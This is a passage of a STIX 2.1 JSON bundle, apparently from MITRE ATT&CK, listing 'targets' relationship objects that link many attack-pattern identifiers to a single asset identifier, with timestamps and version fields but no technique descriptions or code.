"attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--576e2f0c-497a-4002-a831-739a7bcd3f20", "created": "2024-07-01T10:37:15.838065", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838067", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--361ef958-9c5c-48ad-a485-a99caa5547cf", "created": "2024-07-01T10:37:15.838075", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838077", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95bc2508-ead6-43dc-97c1-bc4220cba9a9", "created": "2024-07-01T10:37:15.838084", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838087", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--483e31c3-57fe-4173-9d23-9b9c73d603d9", "created": "2024-07-01T10:37:15.838094", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838096", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25d5768d-ecc2-4605-b8ef-464186b92206", "created": "2024-07-01T10:37:15.838104", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838106", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c363f259-f50d-438a-8a44-a5db49d1046f", "created": "2024-07-01T10:37:15.838114", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838116", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9af6f59d-38a5-4738-af4c-9757adc00262", "created": "2024-07-01T10:37:15.838123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bfda14b-c800-4463-9bad-31d57983356b", "created": "2024-07-01T10:37:15.838133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--98a20d01-3766-4a23-a325-6e46688f6a06", "created": "2024-07-01T10:37:15.838143", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838145", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--db22bdb6-6ba6-44b2-862a-909fcbbd99bd", "created": "2024-07-01T10:37:15.838153", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838172", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59982b92-16ee-4e8d-a3f7-a527e40f33b9", "created": "2024-07-01T10:37:15.838180", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838182", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bd6a2ac-46d2-4dcf-a367-7d6e1bc85bd2", "created": "2024-07-01T10:37:15.838189", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838191", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5283a74c-7e6f-412c-b2a6-506b6e3d05fd", "created": "2024-07-01T10:37:15.838199", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838201", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60e74d63-849a-4f5b-91d7-aeedcfb6f4e6", "created": "2024-07-01T10:37:15.838208", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838210", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a07c5bf0-8065-4df2-900d-4e20d0db8e72", "created": "2024-07-01T10:37:15.838217", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838219", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9201d2b-17a1-40ea-afa3-374602cd3a5b", "created": "2024-07-01T10:37:15.838227", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838229", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b06c448a-7ed0-4637-a2d5-38cded582f1b", "created": "2024-07-01T10:37:15.838236", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838238", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--047c90cf-0393-4559-9ab8-2f775b6cd8e9", "created": "2024-07-01T10:37:15.838246", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838248", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2dca5782-6e32-4f74-99dc-e0a7e0472808", "created": "2024-07-01T10:37:15.838255", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838257", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbe6627b-9596-4672-a43c-23be7cdd256d", "created": "2024-07-01T10:37:15.838264", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838266", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cbf98f96-b5bc-43ad-92d1-59756bee9aec", "created": "2024-07-01T10:37:15.838274", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838276", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46a84702-1713-42ae-9074-3017e2e2c978", "created": "2024-07-01T10:37:15.838283", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838285", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8e92281-5826-4a7d-a92e-2c2ced43c930", "created": "2024-07-01T10:37:15.838292", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838294", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7efece6d-c217-4868-91e8-0778d1bb132c", "created": "2024-07-01T10:37:15.838302", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838304", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7d4c75a-dc13-4b47-ae3a-cc881777699b", "created": "2024-07-01T10:37:15.838311", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838313", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9c18449d-3402-4e08-beea-accdd4b7b574", "created": "2024-07-01T10:37:15.838320", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838322", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--255a21b9-b427-4cb1-9aa6-7075d9a55a27", "created": "2024-07-01T10:37:15.838330", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838332", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37003820-ac6c-48e9-8156-cfe361055db8", "created": "2024-07-01T10:37:15.838339", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838341", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--378aa0e5-7658-4653-9b0e-5765e14e8251", "created": "2024-07-01T10:37:15.838348", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838350", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da965245-1450-48fa-9af3-a24a616fb60a", "created": "2024-07-01T10:37:15.838358", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838360", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91b0e8b5-a7a1-445b-9c57-9010174a6926", "created": "2024-07-01T10:37:15.838367", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838369", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5937f642-9fe0-4524-b0e0-f5c7f2eca304", "created": "2024-07-01T10:37:15.838376", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838379", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ed0dcbd-3a1e-4a8d-96d5-a0de8fbd9369", "created": "2024-07-01T10:37:15.838386", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838388", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--926605ad-ecac-4a93-8cfe-1f50752ca538", "created": "2024-07-01T10:37:15.838395", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838397", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29a7240a-f18b-4374-9f4b-c7288340ac0d", "created": "2024-07-01T10:37:15.838405", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838407", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea8802aa-a488-40b0-8ca4-9aea99fa0ec9", "created": "2024-07-01T10:37:15.838414", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838416", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cba70e70-0292-41eb-b051-1420d34d256d", "created": "2024-07-01T10:37:15.838424", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838426", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea870186-b1a2-4b6d-880b-917d32d34576", "created": "2024-07-01T10:37:15.838433", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838435", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2231b155-44ff-49b1-9a48-7afdc3175efe", "created": "2024-07-01T10:37:15.838442", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838444", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--707af318-f030-45b9-8278-da8ef2f6d038", "created": "2024-07-01T10:37:15.838451", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838453", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--70c8217d-ada2-4234-90d0-ce176d10dc96", "created": "2024-07-01T10:37:15.838461", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838463", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "target_ref": 